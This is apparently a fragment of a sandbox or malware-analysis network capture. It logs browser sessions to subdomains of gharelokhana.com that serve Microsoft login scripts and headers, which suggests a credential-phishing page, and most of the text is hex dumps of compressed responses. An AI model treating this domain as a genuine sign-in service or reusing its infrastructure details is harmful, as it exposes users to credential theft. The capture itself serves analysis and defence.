                                                2024-12-05 07:24:19 UTC16384INData Raw: 6e be 5e 39 c1 0f 0c 4f 52 dc e8 97 02 fa e5 c5 c2 08 bb cd f3 de ad b6 89 0c 56 4c f5 56 63 57 5a ed ed 36 d6 2d 53 fa d3 d1 d4 67 e5 62 e9 c6 a0 24 6e 68 5a d4 a2 99 62 cd 2b 15 00 b6 a6 bf ab d6 d7 c5 7f af f4 d7 0c 7b 4d 07 b8 b6 94 af 54 fd bf 44 3c fd d9 9d 88 bf 9d 98 fe 53 8b d6 5b b1 f9 5b f3 e0 db 31 d0 ab c8 b8 fd ee 6a 63 bc 5d a2 ed b4 fb bd 69 9c b8 ac fe b4 03 6d ff 2f 3e b0 fc f3 17 1f f8 8b 0f a8 3f 9f e6 03 d7 25 e1 a7 f5 9e 43 87 78 f5 59 a5 c5 7b ed c8 ed d0 ad 78 0f 2a 2c b8 b9 00 61 5b 0b de 6c 79 fc 07 90 f5 45 a3 01 b6 28 ca bc dc 39 2b 38 2d ce 09 67 80 82 e2 db 72 fe a2 af ef fe 22 9b 6c ff 7a 21 ea 34 86 75 d2 f6 4e 7b fd 45 3e 65 d9 5f 61 d3 5f a5 08 d3 75 04 0b 2d 3d ba b5 db 1f 36 af c4 e3 65 a9 c6 3e ed 2e cb 7a 89 2b 6c 06
                                                Data Ascii: n^9ORVLVcWZ6-Sgb$nhZb+{MTD<S[[1jc]im/>?%CxY{x*,a[lyE(9+8-gr"lz!4uN{E>e_a_u-=6e>.z+l
                                                2024-12-05 07:24:19 UTC8590INData Raw: 0a b4 f5 c3 a9 db fb d1 4d df 92 64 39 4f 0f 29 74 73 c3 f2 db 92 3a 82 5a 45 9e b1 15 a0 2b 7e b2 40 81 0e d5 4e 4e c2 00 c7 8e da a1 f6 b9 a4 bf bc 85 df b0 5b f8 01 4b 88 9c 68 af 50 1b 81 71 5d 44 1f 48 a8 3d 83 5f 51 7a 4d e2 13 6f f1 96 78 41 4c dc 14 a4 79 ed 14 9e db 1f ed 60 8e 02 2d fa 53 2e 17 08 a4 84 c6 2b 7a 01 2f 41 74 4a a3 1b 36 d9 44 7b 47 c7 71 44 9f 05 bf d3 6d e9 05 54 5e c6 44 7b 33 a5 01 61 a0 03 2a 01 6a af b1 b2 1d a6 2c c3 e9 bf a2 65 0c df a2 65 48 03 a9 69 3f c3 5b 34 1f f0 67 00 24 92 e6 ab 93 68 ff c1 71 d1 9a 6f 89 8b e1 b9 d9 c1 c3 4b 54 47 a2 60 4e 62 cc 46 46 d3 a8 6b bf 4c 69 50 5f ed 1b f8 eb d3 a5 38 bb 86 fd 1e 27 73 02 ea 57 e1 e1 49 b8 58 a6 da 8f 59 c9 f3 0f b0 52 08 2f d0 6e 82 50 fb 0d 5f 1c 61 34 30 7e 17 4d d8
                                                Data Ascii: Md9O)ts:ZE+~@NN[KhPq]DH=_QzMoxALy`-S.+z/AtJ6D{GqDmT^D{3a*j,eeHi?[4g$hqoKTG`NbFFkLiP_8'sWIXYR/nP_a40~M


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.549879164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:17 UTC722OUTGET /3c4125ca1ce249aea8b425e8555a32e2/ HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                Sec-WebSocket-Key: 3ffqw7RFxef0UvlWUSHDXg==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-12-05 07:24:18 UTC740INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:18 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cache-control: private
                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                x-ms-request-id: b5622b00-b2d4-4890-88b4-1342476b2e01
                                                x-ms-ests-server: 2.1.19568.3 - FRC ProdSlices
                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://4b553e95-3c4125ca.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                x-ms-srs: 1.P
                                                referrer-policy: strict-origin-when-cross-origin
                                                access-control-allow-origin: *
                                                access-control-allow-headers: *
                                                2024-12-05 07:24:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.549885164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:20 UTC528OUTGET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:21 UTC806INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:21 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 61138
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Thu, 25 May 2023 17:22:47 GMT
                                                etag: 0x8DB5D44A8CEE4F4
                                                x-ms-request-id: 0e67a5c9-001e-0063-59d0-442912000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072420Z-15b54885d96b2wtthC1FRAycng00000007p0000000006wbw
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:21 UTC15578INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 7b 5b db 48 b2 38 fc ff f9 14 46 cf 1e 56 5a 14 c7 86 24 93 b1 a3 e1 10 70 12 cf 70 5b 2e 73 59 c2 f2 08 b9 c1 4a 6c c9 23 c9 10 16 fc dd 7f 55 d5 77 5d 0c cc cc 79 cf fb cc 04 4b ad ea 7b 75 75 75 75 5d dc db 38 19 a5 b7 ed 82 4d d8 94 15 d9 dd c5 2d bb 9c 85 d1 d7 1f f3 34 99 05 4b bf 3e 3c 9c 9d 7b ed d9 3c 1f bb 67 67 eb e7 fe 99 ef fb 57 f3 24 2a e2 34 71 99 5f f8 89 77 ef cc 73 d6 ca 8b 2c 8e 0a a7 9f b4 33 b7 f0 fc a4 3d 72 0b df f9 39 9c cc d9 4f 50 81 e3 bb 2a 9b 77 9f b1 62 9e 25 ad ac cd 16 9e 82 1d dc b0 a4 d8 0d 0b 96 44 77 0d e0 61 19 fc 90 65 79 9c 63 16 d6 90 e5 d2 c8 72 92 85 11 db 65 37 6c d2 00 3c 32 80 b7 66 b3 61 92 c7 d7 e3 22 df 4e b3 fa e2 63 ab 45 ef c3 9c 35 82 9a 45 5f 0c be 41 93 47 6c 34 4c
                                                Data Ascii: {[H8FVZ$pp[.sYJl#Uw]yK{uuuu]8M-4K><{<ggW$*4q_ws,3=r9OP*wb%Dwaeycre7l<2fa"NcE5E_AGl4L
                                                2024-12-05 07:24:21 UTC12556INData Raw: 93 2b a1 3d e1 4c 43 5e d4 7a c0 b1 45 35 25 4f aa 68 15 9e 1d 46 4d 57 30 f6 ef fc 81 bf 4f d5 ac a0 48 48 17 85 ca 9e 5a 96 94 7b ee 5d f9 3a 8a 8f a2 2a 16 77 57 f2 7a a4 8a 50 c5 13 a9 19 4a fa 32 66 46 28 ac 43 c6 bd 19 68 51 90 87 06 50 37 05 de 25 e4 33 d8 02 56 57 ed 77 68 97 1f 99 3a f1 90 3f b2 6f 36 ef 1a 87 87 ab 91 71 d9 0b 67 93 6f 6b e8 a5 34 d0 a4 b6 71 75 75 5f cc 82 8f 96 69 ba b1 7e 1c fc 0d d5 50 70 0b 14 9c 01 0f fd 33 f8 56 6c 5f 5d e3 bd 99 ba c8 30 c3 2e d5 b9 db 26 4f db 09 97 d6 60 41 c0 7e 92 4f 66 c5 f3 23 00 a9 23 17 a6 c3 a1 70 e1 8e 81 94 14 ee 2d 05 f9 03 94 fe 85 49 9c 41 d1 13 24 7c 60 ee 81 7f db 28 7a 16 7d 23 3f a4 04 ff ab bd 8d bb 65 36 a1 6c 15 60 71 0f f7 87 e2 26 08 96 ed 21 bf 04 ea 25 8b be 75 42 76 f9 ed 86 63
                                                Data Ascii: +=LC^zE5%OhFMW0OHHZ{]:*wWzPJ2fF(ChQP7%3VWwh:?o6qgok4quu_i~Pp3Vl_]0.&O`A~Of##p-IA$|`(z}#?e6l`q&!%uBvc
                                                2024-12-05 07:24:21 UTC16384INData Raw: 4b d3 67 84 ca 68 72 ae bc 21 de 96 18 88 1f 1a 8c d9 54 61 67 90 37 b1 64 23 29 45 4b f3 b9 46 9d 04 62 0c 65 7c 9d 14 33 ff 95 92 3a 82 13 0a b9 e1 6f 1f de bf 2b 8a 89 3c ef 5a d0 b1 b6 96 ba 03 e8 12 48 d9 fb 65 8d d2 e6 e5 eb c7 49 98 e7 7b 5f c2 87 43 96 48 00 da 85 42 df 2b 63 74 90 eb 80 d3 37 5a 5c d6 17 0c c7 b9 03 35 dc 41 83 b6 ad 60 4a 42 0a f4 ad a2 e0 97 86 32 1f 01 a1 d2 69 e1 b0 a7 f3 f9 dc ff 3e dd 84 7a 9e 60 66 f0 6b de d4 96 88 97 72 1e c3 a5 1c d0 d4 28 f1 ae b6 c4 60 29 df 68 ba 94 5b 97 2f e5 a2 8e 96 f2 d1 c6 4b 39 a0 43 a3 c4 f9 52 9e f1 4f 4b 79 c6 f5 1c bf c9 52 5e dc 95 51 e2 70 29 df f9 d7 a5 7c e7 b7 4b f9 ce f5 fc 4d 93 ef 5c cf 89 35 f9 ce c3 7a 26 ba c9 78 3e 5e ca 78 3e 5b ca 78 de 5f ca 78 7e bd 94 f1 5c cf ac 35 19 cf
                                                Data Ascii: Kghr!Tag7d#)EKFbe|3:o+<ZHeI{_CHB+ct7Z\5A`JB2i>z`fkr(`)h[/K9CROKyR^Qp)|KM\5z&x>^x>[x_x~\5
                                                2024-12-05 07:24:21 UTC16384INData Raw: e5 bc 0d 5c fc 04 82 60 d2 db 97 bd 92 17 1c b1 24 32 04 db 7c c8 2b 5a 51 66 90 a3 c8 94 7a 57 58 17 19 37 83 32 97 c3 f4 2c 0a b3 61 7a 5f e7 1b 25 0b 24 3b 58 fa ee 67 d9 c9 82 ae 6e 52 4a 53 2a 1a bb 2c 54 61 1f 52 d6 e1 44 0d d6 d9 85 33 38 00 14 3e 05 d3 ef 15 67 0d 94 38 6b fc ef c1 ff 4d e5 db 6f 53 5c 00 9b 32 ba d7 0b 01 ff 71 2f 8c e4 35 0a 55 8f dd 4d e1 db 0f d7 6b 5f de 17 77 78 37 7d fd 99 18 53 a4 e4 8b 88 bf 5c 40 a5 b6 34 ef d1 02 66 98 4e 34 d8 b5 03 8c a6 f9 a1 42 99 5f d9 8e 32 05 17 0e 26 8c 82 dd 42 95 25 2f 23 d3 98 b1 40 78 14 33 30 54 c1 0c c0 a5 6e f4 68 8a ba 17 3d 38 8f a1 33 49 04 77 9b e3 2f 5d b9 99 f4 8a 19 23 e2 e7 e2 5e a3 7d c4 d9 4f b9 d2 88 61 4f 26 cb b0 9d 77 4d 19 e5 25 6d 6e 98 f7 d6 f9 36 ca 64 01 c2 58 58 1c 58
                                                Data Ascii: \`$2|+ZQfzWX72,az_%$;XgnRJS*,TaRD38>g8kMoS\2q/5UMk_wx7}S\@4fN4B_2&B%/#@x30Tnh=83Iw/]#^}OaO&wM%mn6dXXX
                                                2024-12-05 07:24:21 UTC236INData Raw: a2 f4 1e f3 dd 94 ee ea f4 c9 c6 37 3c 61 17 e6 82 bc 0b ea 02 bb 0c 16 0b 18 b9 78 76 59 16 78 02 d3 a5 9a aa 71 5d a4 74 80 a6 7c 58 b9 89 5e 81 ca 21 39 f9 2a 46 b7 0d df 8d 64 a2 1f 29 b0 3d 61 f3 10 4f 67 3c cc 72 6b 33 b5 60 78 ed 8d 5c b2 14 0d 3c 04 c9 d1 84 96 4f ce f2 35 91 c0 f0 d5 32 dc 57 ce 71 58 ef d8 12 e4 07 6d 72 33 18 d2 9f 99 a4 b9 99 a4 b0 6e 7f a6 a6 d8 11 d9 77 7d 03 a6 42 be 49 df 65 3c a1 6e 4b ac 46 27 02 29 c5 a6 7a dd 8e 38 05 52 4c dc 9b da 81 ba 3b c2 84 5a eb ee 0a 1d b3 b4 bb 77 e7 df 8d 40 d4 fe 8f c7 8f ff 73 a3 c8 96 39 32 ea 8b 05 10 89 8f 27 6f 83 2c 8d 0e 8b f3 69 27 6a 4d 77 c3 56 e7 d9 fe 93 d6 b4 dd 9a 3c 7d d6 69 7e 29 9a f3 70 f1 3f 88 9b 68 bf 3f e7 02 00
                                                Data Ascii: 7<axvYxq]t|X^!9*Fd)=aOg<rk3`x\<O52WqXmr3nw}BIe<nKF')z8RL;Zw@s92'o,i'jMwV<}i~)p?h?


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.549886164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:24:20 UTC760OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1
                                                Host: 33767741-3c4125ca.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: zQt4SK="M2M0MTI1Y2EtMWNlMi00OWFlLWE4YjQtMjVlODU1NWEzMmUyOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                2024-12-05 07:24:21 UTC807INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Thu, 05 Dec 2024 07:24:21 GMT
                                                Content-Type: application/x-javascript
                                                Content-Length: 116432
                                                Connection: close
                                                cache-control: public, max-age=31536000
                                                last-modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                etag: 0x8DCBD5317046A2F
                                                x-ms-request-id: fe4eb8a5-101e-005b-2e8c-46c5c0000000
                                                x-ms-version: 2009-09-19
                                                x-ms-lease-status: unlocked
                                                x-ms-blob-type: BlockBlob
                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                access-control-allow-origin: *
                                                x-azure-ref: 20241205T072420Z-15d6f6465c8dk6rvhC1DUSu8gc00000000w00000000030sz
                                                x-fd-int-roxy-purgeid: 0
                                                x-cache: TCP_HIT
                                                accept-ranges: bytes
                                                content-encoding: gzip
                                                2024-12-05 07:24:21 UTC15577INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 5b db 48 b6 28 fc 7d ff 0a 5b bb c7 2d b5 0b 63 19 30 44 46 78 48 42 7a 98 49 02 07 c8 f4 f4 10 4f 1e 61 97 b1 12 23 79 74 e1 d2 d8 fb b7 bf 6b ad aa 92 4a b2 0c 26 dd fb 9c 0f ef f4 d3 c1 ba 94 ea 5e eb 7e d9 fc a9 fe 5f b5 9f 6a 1b eb ff 57 3b bf 38 3c bb a8 9d bc ab 5d fc e5 f8 ec 6d ed 14 ee 7e ad 7d 3c b9 38 7e 73 b4 7e 3d d8 28 fe bb 98 f8 71 6d ec 4f 79 0d 7e af bc 98 8f 6a 61 50 0b a3 9a 1f 0c c3 68 16 46 5e c2 e3 da 0d fc 8d 7c 6f 5a 1b 47 e1 4d 2d 99 f0 da 2c 0a bf f2 61 12 d7 a6 7e 9c c0 47 57 7c 1a de d5 4c a8 2e 1a d5 4e bd 28 79 a8 1d 9f 5a 2d a8 9f 43 6d fe b5 1f c0 d7 c3 70 f6 00 d7 93 a4 16 84 89 3f e4 35 2f 18 51 6d 53 b8 09 62 5e 4b 83 11 8f 6a 77 13 7f 38 a9 7d f0 87 51 18 87 e3 a4 16 f1 21 f7 6f
                                                Data Ascii: k[H(}[-c0DFxHBzIOa#ytkJ&^~_jW;8<]m~}<8~s~=(qmOy~jaPhF^|oZGM-,a~GW|L.N(yZ-Cmp?5/QmSb^Kjw8}Q!o
                                                2024-12-05 07:24:21 UTC14460INData Raw: 50 3c a7 8d 35 29 b4 b4 37 ed 87 fd a7 5e 67 d2 69 a4 09 2b 0b 6a 76 db 85 c2 38 1e 0c d5 2e 47 54 b9 4f 81 98 cd 68 0f 45 0e 89 61 23 e5 23 69 30 8d 8e d0 e7 28 0b 5c 68 53 96 4b 19 33 d1 cb e6 94 f4 01 f5 02 a7 61 8a c3 e7 92 5b 83 44 b1 41 e9 34 a0 12 4a 9c 4b 97 3c 2f b2 83 99 df 6e 64 f7 22 2b a9 6a 7c bf 83 44 ae ba ce 77 4a ec 76 58 ba 09 7f 3c fc 13 c1 9f 12 7b 99 49 16 6c 72 5a 14 01 b1 5b 98 91 ee d3 71 90 d8 dd d7 47 26 ff 29 b6 16 b4 53 69 dc 63 77 43 38 20 f9 6e d4 f3 f7 53 0a 91 4e 49 08 12 e6 5b 50 0b da 60 6f 60 75 63 38 0e fe c6 58 f4 54 3c 81 89 18 bb be c5 e0 71 d3 d6 4c a5 6b e3 9f 62 da f2 1b 68 a4 88 c5 fc 0d 17 bf 65 d8 5c 6e 03 1d 35 bd 83 54 38 45 6e 78 24 2c e9 f9 e8 fc e4 6f 6c e4 ca dd 29 aa 64 27 f0 74 b2 ef f5 26 5a ef 9a 48
                                                Data Ascii: P<5)7^gi+jv8.GTOhEa##i0(\hSK3a[DA4JK</nd"+j|DwJvX<{IlrZ[qG&)SicwC8 nSNI[P`o`uc8XT<qLkbhe\n5T8Enx$,ol)d't&ZH
                                                2024-12-05 07:24:22 UTC16384INData Raw: d9 f1 19 91 55 0a 6a 24 f1 b5 67 4f d6 d1 13 23 cb 7e 83 a3 24 ff 40 01 d0 9b ed 6f a5 1a d4 13 92 23 0c 34 26 de b6 98 b4 84 d8 54 b5 d0 77 87 61 8a 82 62 01 3e 9e 5a 10 0d 05 9b 6d 7b 5d 18 77 93 33 d6 25 e7 eb a2 3d b3 cc 65 c9 e9 1e db c1 a4 11 a5 57 5d 87 1c d6 81 ed ec 91 90 82 de 45 3d b8 99 7c 24 e5 30 77 71 8c 74 28 11 76 11 3d e1 45 a0 6c 0b 69 9d 73 bd ce c6 72 46 8f 8f bc a7 c7 c7 16 4f c7 d0 e6 52 11 b4 f8 4b f0 0a c6 1f 59 a3 6d 2e 3b 49 ad 84 f8 d1 b9 44 ac e4 84 97 8e 5e 78 33 c5 90 ed 83 2f eb 60 e1 7c 99 a7 7e 74 d8 b2 c2 85 35 22 12 46 19 5f 62 32 0c 25 03 cf dc 83 56 e7 8b 51 d8 57 26 3f 83 d8 05 6c d8 c2 ec 68 b0 89 e2 61 df 14 a3 c6 cf 14 a3 e6 b5 e7 6d 51 be 88 32 0f 9e 79 2a 31 cb 33 1e 99 27 46 4e 2b 47 49 02 d7 34 e6 32 0e 60 2e
                                                Data Ascii: Uj$gO#~$@o#4&Twab>Zm{]w3%=eW]E=|$0wqt(v=ElisrFORKYm.;ID^x3/`|~t5"F_b2%VQW&?lhamQ2y*13'FN+GI42`.
                                                2024-12-05 07:24:22 UTC16384INData Raw: de db f6 96 48 0b 96 0c 9f 39 97 f7 45 f4 3d e1 06 07 1d da 0b 14 a0 56 a6 e0 18 9f 3a 72 3a 16 f0 18 15 d0 a7 96 4c f1 8d bc 64 4d dd c9 ea cb 2f 79 84 ed 03 a9 80 14 74 ed 3e de 87 25 ed cc 1e bf 3c 0f a4 48 fe 60 5b 64 c5 dd c7 33 33 0d 50 28 85 f2 18 e0 94 47 27 53 b8 e9 01 11 27 4d 63 b4 70 9d 26 cd 57 61 11 fe 18 47 b7 70 a5 26 4d b5 78 70 a1 aa 3b e0 26 98 18 6b 76 15 cc 8c a7 6b 58 8f 1b 01 06 ec 12 28 ae 1b e6 64 51 1e ff 1d 65 13 72 4d d9 2d 7f 71 1d de bd 5c 58 70 a0 50 52 f7 0a 0d a6 df 24 05 8c fb 82 1e 73 f1 68 6c a2 0b 97 c8 10 e5 69 75 02 58 86 11 22 0b 5c ab c8 e2 5a 52 1f 6f 0a 98 c2 fa 25 5c 41 97 c2 6e b2 b4 f7 70 64 ef 61 9c a3 3c 1f 53 36 8c b8 bf c4 98 ac 0d 30 a9 f8 43 91 85 49 0e 95 fc 7e 31 c0 a0 82 68 b1 8b be 59 8f 8f 37 66 e2
                                                Data Ascii: H9E=V:r:LdM/yt>%<H`[d33P(G'S'Mcp&WaGp&Mxp;&kvkX(dQerM-q\XpPR$shliuX"\ZRo%\Anpda<S60CI~1hY7f
                                                2024-12-05 07:24:22 UTC2731INData Raw: be a8 a7 ca bb a3 0f 01 42 0f ba 1d 3a 06 ef 82 b3 6a 14 bb e4 65 cd 17 e2 26 4c 28 91 3b 55 d9 1c a1 b6 dc c5 2b d6 c2 73 72 58 02 d6 ea a6 0a ea 5c 9f 7b b4 4b 31 87 45 fc d9 95 55 6a b2 2e 2c 53 ff 05 81 b5 5d 54 20 09 80 79 f9 2c b5 dd 7d 45 8f 16 96 38 86 ea 67 81 ee aa 52 cb 50 55 86 7a 61 fe ed f4 f5 2b 43 81 82 b1 7a 36 9d 36 c5 de 9b c7 6e 86 61 c8 73 0f 4e 9d d9 a3 c4 b3 f1 43 e1 0e ca 01 ea d5 4e 22 4a c0 85 8c 9b 22 62 10 c3 92 27 5b 58 b9 a9 67 ec 32 35 bb 2c ec ca 74 20 7f e3 66 2d c1 82 79 09 54 21 b3 58 2d a3 4c 28 b4 4a f1 a0 a0 9a ed c4 9f da 04 78 89 ba 7f f4 2c 13 8e f1 af 7c 23 e5 6e df e4 01 b5 bd 4d 39 75 04 fb a2 e3 82 20 5c 84 b8 c2 74 be 10 51 6e 10 cb 97 6f 4c bb 6e ec b0 f9 7d 11 ff 40 65 ba 35 39 2b e0 a7 32 2a 73 b3 df 82 b3
                                                Data Ascii: B:je&L(;U+srX\{K1EUj.,S]T y,}E8gRPUza+Cz66nasNCN"J"b'[Xg25,t f-yT!X-L(Jx,|#nM9u \tQnoLn}@e59+2*s
                                                2024-12-05 07:24:22 UTC16384INData Raw: 5d 4b 26 cd 55 40 c8 04 10 ca 24 b6 a2 a8 31 cd 8f a2 92 49 75 0b 90 a1 1a ac 0d bd 3c 60 15 9d 99 12 00 52 27 a8 28 12 cd 84 d2 75 93 01 16 1a 9b 39 25 13 80 44 36 84 0f 83 60 1d fc 31 cc 8c 30 3f f0 93 74 9a 44 a4 a0 66 c0 69 65 2d e0 cc d5 82 0f 2d 60 62 1d cf 8c 73 12 0d ad bd 47 56 bd 1a de e3 8e a7 e8 39 68 37 df e5 9b c4 68 96 30 02 fd f6 aa b6 9c c2 8c 60 80 57 f5 0b 0f 4c e9 96 8e 86 a9 97 b5 80 31 68 55 1a 4f cb 8d d7 86 06 37 88 e3 65 85 4e cc 60 34 62 37 19 34 a8 9f 99 ce 8e 11 73 25 7e 11 be 79 f0 df c9 20 41 b0 44 d6 8e 20 24 74 5a 71 a1 0b 53 f6 c3 ac 95 2d 00 31 5e c3 e3 b4 1b 78 9c 1a 6b 00 3c ce 6e 9d c7 b1 c2 6a 19 f0 38 27 95 b2 35 3c 04 f3 0f 94 de c9 47 3d 95 86 7f 09 a0 8b 24 52 bd 7e 54 f5 9d a5 a8 b8 88 eb ee ee 22 52 78 e3 fd 4f
                                                Data Ascii: ]K&U@$1Iu<`R'(u9%D6`10?tDfie--`bsGV9h7h0`WL1hUO7eN`4b74s%~y AD $tZqS-1^xk<nj8'5<G=$R~T"RxO
                                                2024-12-05 07:24:22 UTC12576INData Raw: 71 6e b4 96 37 37 90 b0 3f 74 3f d3 58 29 8f e4 5f 31 d8 4b 6c 58 19 31 dd 6f 84 bc fe 6a 6c d6 48 c9 44 e9 10 f3 51 3c 14 d8 b8 55 3b 15 56 ed ae 31 0d c2 56 26 32 12 bb 99 48 b6 a3 1b 7c fc 74 93 61 bd 2c 70 93 0c 02 23 70 8e 72 8d f4 11 55 d9 66 80 d2 92 2f 41 d7 b1 d0 f7 b0 b2 24 f4 a5 23 3d 25 f4 25 11 6f 5a e8 db a0 80 a0 23 5d 23 63 1d 0d 05 bf 63 d5 56 f6 8e 9f 04 6c 68 be b3 c2 11 9c 71 f7 eb 80 51 1f a6 88 1a 5c 32 47 16 0a 2b 36 86 5e f4 04 ae e8 03 d7 33 42 e3 23 a0 98 58 1f cd 8e 22 3d 6d 18 db 6f da f0 80 db e8 8d 70 66 7d 73 94 36 c7 75 80 04 a7 72 d3 bc 9b cf 3d dd 4f 9b e3 06 f4 58 9a e3 fa a6 df 99 71 73 5c 5f b1 0c 63 e2 6d df 4c d9 8b c5 6a ab 11 9b b0 1b 8e b9 28 e7 99 9e aa d8 be 6b fa 86 3e d4 6f 8a 13 e4 e0 28 01 cc e4 e8 a6 35 29
                                                Data Ascii: qn77?t?X)_1KlX1ojlHDQ<U;V1V&2H|ta,p#prUf/A$#=%%oZ#]#ccVlhqQ\2G+6^3B#X"=mopf}s6ur=OXqs\_cmLj(k>o(5)
                                                2024-12-05 07:24:22 UTC16384INData Raw: 4c 7c cc b5 5d a0 98 b0 29 72 d2 e7 22 4b 78 a1 13 76 75 1e e2 8d 2d 23 56 57 ca 0d 99 47 98 8f 46 87 31 20 3c ae ae e7 21 1a 62 4b c2 38 f8 46 ce 2d 71 b5 46 62 3b 4d ef 70 8a db 2d 01 f5 84 db 1a 13 a8 59 41 78 8e 5b 05 56 58 42 c1 00 ce 9d 0e 26 70 00 3c c2 e5 b9 fa c0 e4 2d 18 2d de b1 19 62 7c b2 a1 9e 76 fa 5d 73 c6 15 82 33 5c 7a a5 49 14 3d 45 6a 09 3a d8 c2 39 56 28 c4 29 57 e0 2d 40 f1 f0 95 e6 74 d1 5d 6c 2e 3d 8c 0d ca e2 03 b7 7e 20 02 0b d7 f6 1a a9 a0 6f 02 1c 06 12 1c c6 12 64 46 12 64 a6 52 e7 41 46 2c 68 d6 32 93 22 e6 3b 09 32 8f 19 b1 d4 44 94 24 b4 3c ba 97 60 75 25 c0 8a 8c 57 28 1c d2 85 3c da cf cc 1b 01 6a a8 36 44 fb 95 13 8a 5f 74 0d bf 4a 80 23 a1 b7 e0 7b 79 47 92 9a 1a 46 51 5a 91 79 7f 48 14 30 d2 b2 25 36 5d 11 a6 2d f2 83
                                                Data Ascii: L|])r"Kxvu-#VWGF1 <!bK8F-qFb;Mp-YAx[VXB&p<--b|v]s3\zI=Ej:9V()W-@t]l.=~ odFdRAF,h2";2D$<`u%W(<j6D_tJ#{yGFQZyH0%6]-
